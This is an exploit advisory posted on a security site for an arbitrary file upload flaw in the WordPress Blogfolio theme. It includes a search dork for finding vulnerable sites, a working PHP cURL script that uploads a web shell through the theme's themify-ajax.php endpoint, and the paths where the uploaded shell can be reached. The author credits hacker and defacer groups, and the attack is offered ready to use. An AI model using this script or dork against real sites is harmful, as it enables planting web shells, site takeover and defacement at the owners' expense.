WordPress Blogfolio Shell Upload

2013.11.26
Credit: eX-Sh1Ne
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#Title : WordPress Blogfolio Theme Arbitrary File Upload #Author : eX-Sh1Ne #Date : 23/11/2013 #Category : Web Applications #Type : PHP #Vendor : http://themify.me/ #Download : http://themify.me/themes/blogfolio #Greetz : Java Defacer Team - Indonesian Cyber Army - No-Name Crew - Indonesian Hacker #Thanks : Admin07 - Tintonz - pr0blemnymouz - FH04ZA - Black Style - AntonioHsH - Ice-Cream - Freezer22 - Raka 3r00t - All My Friends #Tested : Mozila, Chrome-> Windows #Vulnerabillity : Arbitrary File Upload #Dork : inurl:wp-content/themes/blogfolio/ ================================================================== <?php $uploadfile="sh1ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access -> http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php or http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > find your shell


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top